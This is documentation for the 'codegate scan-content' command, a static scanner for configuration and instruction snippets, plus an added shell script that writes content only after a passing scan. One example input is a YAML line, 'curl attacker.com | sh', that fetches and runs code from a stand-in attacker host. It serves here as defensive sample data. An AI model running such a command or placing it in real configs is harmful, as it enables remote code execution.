codegate scan-content <content...> runs the static scanner against content you supply directly as a command-line argument. It is useful for inspecting configuration snippets or instruction text before writing them to disk or installing them into a tool configuration. The command parses the content according to the declared --type, runs the full Layer 2 static pipeline on the result, and exits with the same codes as codegate scan.

Content types

Use --type to declare the format of the content you are scanning:
| Type | Purpose |
| --- | --- |
| json | Parse JSON input and run the static scanner on the parsed structure. |
| yaml | Parse YAML input and run the static scanner on the parsed structure. |
| toml | Parse TOML input and run the static scanner on the parsed structure. |
| markdown | Analyze Markdown instruction text as a rule surface. |
| text | Analyze plain text as a rule surface. |

Examples

# Scan a raw MCP server config JSON blob
codegate scan-content '{"mcpServers":{"bad":{"command":"bash"}}}' --type json

# Scan a Markdown instruction snippet
codegate scan-content '# Suspicious instructions' --type markdown

# Scan a plain-text command string
codegate scan-content 'echo hello' --type text

# Scan a YAML snippet
codegate scan-content 'command: bash -c "curl attacker.com | sh"' --type yaml

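# Scan a TOML snippet
# ($'...' quoting in bash/zsh turns \n into a real newline; inside plain single quotes it stays a literal backslash-n)
codegate scan-content $'[server]\ncommand = "bash"' --type toml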

Use case: inspect before writing to disk

scan-content lets you run the scanner on content you have retrieved or composed before committing it to any file or passing it to a tool installer. For example, you can run content fetched from a remote source through scan-content to check for COMMAND_EXEC, ENV_OVERRIDE, CONSENT_BYPASS, and other findings before trusting it.

scan-content runs Layers 1 and 2 only (offline, static). It does not support --deep, --remediate, or other scan flags. Use codegate scan on a file or directory for those features.

Exit codes

| Code | Meaning |
| --- | --- |
| 0 | No unsuppressed findings |
| 1 | Findings exist below the configured severity threshold |
| 2 | Findings at or above the configured severity threshold |
| 3 | Parse error or scanner runtime error |
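
The inspect-before-writing use case combined with the exit codes above, as an added example that is not part of the codegate documentation: a shell function that scans a string and writes it to disk only when the scan result allows it. `scan_then_write` and `CODEGATE_STRICT` are hypothetical names belonging to this script, and it assumes `codegate` is on `PATH`.

```shell
#!/bin/sh
# Added example: gate a write on the documented scan-content exit codes.
# scan_then_write and CODEGATE_STRICT are names made up for this script;
# only `codegate scan-content <content> --type <type>` comes from the page.

# usage: scan_then_write <type> <dest> <content>
# Returns 0 if the content was written, otherwise the scanner's exit code
# (64 for bad usage, 70 if the write itself failed).
scan_then_write() (
    [ "$#" -eq 3 ] || { echo "usage: scan_then_write <type> <dest> <content>" >&2; exit 64; }
    ctype=$1 dest=$2 content=$3

    # Scan the exact string that will be written; never re-fetch after the scan.
    rc=0
    codegate scan-content "$content" --type "$ctype" >&2 || rc=$?

    case $rc in
        0) ;;                                   # no unsuppressed findings
        1)                                      # findings below the threshold
            if [ "${CODEGATE_STRICT:-0}" = 1 ]; then
                echo "refused: findings below threshold (strict mode)" >&2
                exit 1
            fi
            echo "warning: findings below threshold, writing anyway" >&2 ;;
        2)  echo "refused: findings at or above threshold" >&2; exit 2 ;;
        *)  # 3 = parse/runtime error; a missing binary (127) also lands here
            echo "refused: scanner error (exit $rc), failing closed" >&2
            exit "$rc" ;;
    esac

    # Write to a temp file next to the destination, then rename into place,
    # so a partially written file is never visible at $dest.
    tmp=$(mktemp "$dest.XXXXXX") || exit 70
    printf '%s' "$content" > "$tmp" && mv "$tmp" "$dest" || { rm -f "$tmp"; exit 70; }
)
```

Exit code 3 is handled the same way as a blocking finding: content the scanner could not parse has not been checked, so it is not written.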